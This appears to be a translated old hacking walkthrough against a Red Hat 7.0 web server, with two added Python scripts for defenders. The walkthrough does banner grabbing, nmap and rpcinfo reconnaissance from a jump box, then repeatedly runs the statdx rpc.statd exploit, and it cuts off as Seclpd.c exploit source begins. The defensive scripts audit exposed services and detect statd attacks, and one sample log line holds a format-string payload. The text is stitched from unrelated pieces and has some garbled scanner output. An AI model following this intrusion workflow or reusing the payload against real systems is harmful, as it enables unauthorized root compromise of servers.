The purpose of this article is not to teach people how to break into Linux servers, but to help readers improve their own skills and to raise the security awareness of network administrators. That's all! Careless network administrators should understand that one small mistake can bring the entire network down! This article focuses on LPD (network printing service) attacks.
First, pick the target; assume it is Www.XXX.com.
Let's first see whether it is reachable:
The following is a reference clip:
C:\> ping Www.XXX.com
Pinging Www.XXX.com [202.106.184.200] with 32 bytes of data:
Reply from 202.106.184.200: bytes=32 time=541ms TTL=244
Reply from 202.106.184.200: bytes=32 time=620ms TTL=244
Reply from 202.106.184.200: bytes=32 time=651ms TTL=244
Reply from 202.106.184.200: bytes=32 time=511ms TTL=244
Ping statistics for 202.106.184.200:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 511ms, Maximum = 651ms, Average = 580ms
......
Telnet to see the banner:
C:\> telnet Www.XXX.com
The connection to the host is lost.
Try ftp next:
The following is a reference segment:
C:\> ftp Www.XXX.com
Connected to Www.fbi.gov.tw.
220 XXX-www FTP server (Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000) ready.
User (Www.XXX.com:(none)):
wu-2.6.1 catches the eye: this box looks like Red Hat 7.0! First, log in to the stepping-stone host (the jump box everything will be launched from):
The following is a reference snippet:
C:\> telnet xxx.xxx
Red Hat Linux release 7.0 (Guinness)
Kernel 2.2.16-22smp on an i686
login: fetdog
Password:
bash-2.04$
Now bring out the nmap scanner and see what secrets it turns up ~~~
The following is a reference snippet:
bash-2.04$ nmap -sT -O Www.XXX.com
Starting nmap V. 2.54BETA7 (Www.insecure.org/nmap/)
WARNING! The following files exist and are readable: /usr/local/sha-services and ./nmap-services. I am choosing /usr/local/share/nmap/s for security reasons. set NMAPDIR=. to give priority to files in irectory
Interesting ports on (Www.XXX.com):
(The 1520 ports scanned but not shown below are in state: closed)
Port     State  Service
25/tcp   open   smtp
79/tcp   open   finger
80/tcp   open   http
111/tcp  open   sunrpc
113/tcp  open   auth
443/tcp  open   https
513/tcp  open   login
514/tcp  open   shell
515/tcp  open   printer
587/tcp  open   submission
1024/tcp open   kdm
TCP Sequence Prediction: Class=random positive increments
Difficulty=3247917 (Good luck!)
Remote operating system guess: Linux 2.1.122-2.2.16
Nmap run completed -- 1 IP address (1 host up) scanned in 9 seconds
Many ports are open, which raises the odds of finding a way in. 79/tcp finger is open, so check that first, although Linux finger does not have the user-list vulnerability.
The following is a reference clip:
bash-2.04$ finger @Www.XXX.com
[Www.XXX.com]
No one logged on.
Now look at 111/tcp sunrpc. RPC vulnerabilities have been popular lately; does RH7 have one? Let's take a look!
The following is a reference clip:
bash-2.04$ rpcinfo -p Www.XXX.com
program vers proto port service
100000 2 tcp 111 rpcbind
100000 2 udp 111 rpcbind
100021 1 udp 1024 nlockmgr
100021 3 udp 1024 nlockmgr
100024 1 udp 1025 status
100024 1 tcp 1024 status
So rpc.statd is running. Let's see whether it can be overflowed remotely to get a root shell.
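Read from the administrator's side, the nmap table and the rpcinfo listing together say what has to be switched off. The following Python is an added example, not code from the article: it parses both listings as printed above and flags the legacy services that should not face the Internet, using the portmapper's registration to correct nmap's service guess (the scan labels 1024/tcp "kdm" from its services file, but rpcinfo shows rpc.statd registered there). The service-to-action table is my own hardening advice, not from the article.

```python
import re
from typing import Dict, Tuple

# Program numbers seen in the article's rpcinfo listing (100000 is the portmapper).
RPC_PROGRAMS = {100000: "sunrpc", 100021: "nlockmgr", 100024: "rpc.statd"}
# Services in that scan which should not face the Internet, with the hardening
# action a defender would take on a Red Hat 7.0 host of that era (my advice).
RISKY = {
    "finger":    "leaks logged-in user names; remove finger-server or block 79/tcp",
    "sunrpc":    "portmapper advertises rpc.statd; filter 111 and the ports it hands out",
    "login":     "rlogin trusts host names; disable it in inetd/xinetd",
    "shell":     "rsh trusts host names; disable it in inetd/xinetd",
    "printer":   "lpd/LPRng reachable remotely; restrict to local hosts or block 515/tcp",
    "rpc.statd": "NFS lock-status daemon exposed; stop nfslock or filter its port",
}

NMAP_LINE = re.compile(r"^\s*(\d+)/(tcp|udp)\s+open\s+(\S+)")
RPC_LINE = re.compile(r"^\s*(\d+)\s+\d+\s+(tcp|udp)\s+(\d+)\s+(\S+)")

def parse_nmap(text: str) -> Dict[Tuple[int, str], str]:
    """(port, proto) -> service name exactly as nmap guessed it."""
    return {(int(m[1]), m[2]): m[3]
            for m in map(NMAP_LINE.match, text.splitlines()) if m}

def parse_rpcinfo(text: str) -> Dict[Tuple[int, str], str]:
    """(port, proto) -> RPC program registered there (resolves dynamic ports)."""
    return {(int(m[3]), m[2]): RPC_PROGRAMS.get(int(m[1]), m[4])
            for m in map(RPC_LINE.match, text.splitlines()) if m}

def audit(nmap_text: str, rpcinfo_text: str) -> Dict[int, Tuple[str, str]]:
    """Risky open ports: port -> (real service, action). The portmapper's
    registration wins over nmap's /etc/services guess (1024 is not 'kdm')."""
    rpc = parse_rpcinfo(rpcinfo_text)
    findings = {}
    for (port, proto), guess in parse_nmap(nmap_text).items():
        svc = rpc.get((port, proto), guess)
        if svc in RISKY:
            findings[port] = (svc, RISKY[svc])
    return findings

# Excerpts of the article's two listings (nmap port table, rpcinfo -p).
NMAP_SAMPLE = ("25/tcp open smtp\n79/tcp open finger\n80/tcp open http\n"
               "111/tcp open sunrpc\n513/tcp open login\n514/tcp open shell\n"
               "515/tcp open printer\n1024/tcp open kdm\n")
RPCINFO_SAMPLE = ("program vers proto port service\n100000 2 tcp 111 rpcbind\n"
                  "100024 1 udp 1025 status\n100024 1 tcp 1024 status\n")

if __name__ == "__main__":
    for port, (svc, action) in sorted(audit(NMAP_SAMPLE, RPCINFO_SAMPLE).items()):
        print(f"{port:>5}/tcp {svc:<10} {action}")
```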
The following is a reference clip:
bash-2.04$ ./statdx -h
statdx by ron1n
Usage: statdx [-t] [-p port] [-a addr] [-l len]
       [-o offset] [-w num] [-s secs] [-d type]
-t   attack a tcp dispatcher [udp]
-p   rpc.statd serves requests on <port> [query]
-a   the stack address of the buffer is <addr>
-l   the length of the buffer is <len> [1024]
-o   the offset to return to is <offset> [600]
-w   the number of dwords to wipe is <num> [9]
-s   set timeout in seconds to <secs> [5]
-d   use a hardcoded <type>
Available types:
0    RedHat 6.2 (nfs-utils-0.1.6-2)
1    RedHat 6.1 (knfsd-1.4.7-7)
2    RedHat 6.0 (knfsd-1.2.2-4)
RH7 is not among the supported types. Try anyway: go through all of 0-2! Start ......
bash-2.04$ ./statdx -d 0 Www.XXX.com
buffer: 0xbffff314 length: 999 (+str/+nul)
target: 0xbffff718 new: 0xbffff56c (offset: 600)
wiping 9 dwords
Failed - statd returned res_stat: (failure) state: 21
Annoying. Try again ......
bash-2.04$ ./statdx -d 1 Www.XXX.com
buffer: 0xbffff314 length: 999 (+str/+nul)
target: 0xbffff718 new: 0xbffff56c (offset: 600)
wiping 9 dwords
Failed - statd returned res_stat: (failure) state: 21
Same result. Keep going:
The following is a reference clip:
bash-2.04$ ./statdx -d 1 Www.XXX.com
buffer: 0xbffff314 length: 999 (+str/+nul)
target: 0xbffff718 new: 0xbffff56c (offset: 600)
wiping 9 dwords
Failed - statd returned res_stat: (failure) state: 21
rpc.statd is a dead end. Thinking back to the RH7 remote overflow, it was in the lp service, as I recall; "Seclpd.c" should be the one.
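The defender's counterpart to the statdx attempts above is spotting them in syslog, since each request leaves a trace whether or not it succeeds. The following Python is an added example, not code from the article; it assumes rpc.statd logs a failed lookup of the SM_MON caller name as "gethostbyname error for <name>" (the message the vulnerable statd handed to syslog), and the sample log lines are constructed, not real captures. It flags entries whose "hostname" carries printf conversions or raw stack bytes instead of a name.

```python
import re
from typing import List, Tuple

# Assumed syslog shape: "<Mon dd hh:mm:ss> <host> rpc.statd[<pid>]: <message>";
# read log files as latin-1 so raw high bytes survive as single characters.
SYSLOG_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]+) (?P<host>\S+) rpc\.statd\[\d+\]: (?P<msg>.*)$")
# Message statd emits when the SM_MON caller name does not resolve (assumed wording).
HOSTNAME_PREFIX = "gethostbyname error for "
# printf conversions an attacker needs to walk the stack and write with %n.
FORMAT_SPEC = re.compile(r"%\d*(?:hh?|l)?[nxdspu]")
VALID_HOSTNAME = re.compile(r"^[A-Za-z0-9.-]{1,255}$")

def classify(msg: str) -> List[str]:
    """Reasons a statd message looks like a format-string attack; [] if benign."""
    reasons = []
    if FORMAT_SPEC.search(msg):
        reasons.append("printf conversion specifiers in logged hostname")
    if any(not 0x20 <= ord(c) <= 0x7e for c in msg):
        reasons.append("non-printable bytes (stack addresses or shellcode)")
    if msg.startswith(HOSTNAME_PREFIX):
        if not VALID_HOSTNAME.match(msg[len(HOSTNAME_PREFIX):]):
            reasons.append("SM_MON caller name is not a valid hostname")
    return reasons

def scan(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """(timestamp, host, reasons) for every rpc.statd line that looks hostile."""
    hits = []
    for line in lines:
        m = SYSLOG_LINE.match(line)
        if m and (reasons := classify(m["msg"])):
            hits.append((m["ts"], m["host"], reasons))
    return hits

# Constructed sample: two benign lines and one attack attempt, whose "hostname"
# is little-endian stack addresses followed by %x padding and %hn writes.
SAMPLE_LOG = [
    "Aug 23 17:31:10 www rpc.statd[408]: Version 0.1.6 Starting",
    "Aug 23 17:31:11 www rpc.statd[408]: gethostbyname error for nfsclient.example.net",
    "Aug 23 17:32:02 www rpc.statd[408]: gethostbyname error for "
    "\x18\xf7\xff\xbf\x18\xf7\xff\xbf\x19\xf7\xff\xbf%8x%8x%8x%8x%62716x%hn%51859x%hn",
]

if __name__ == "__main__":
    for ts, host, reasons in scan(SAMPLE_LOG):
        print(f"{ts} {host}: possible rpc.statd exploit attempt: {'; '.join(reasons)}")
```

A benign unresolvable client name (second sample line) produces no hit, so the rule keys on the shape of the name rather than on the lookup failure itself.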
----- The following code is for teaching purposes only and must not be used for malicious attacks -----
The following is a reference clip:
/*
* WelcomeHttp://hlc.cnro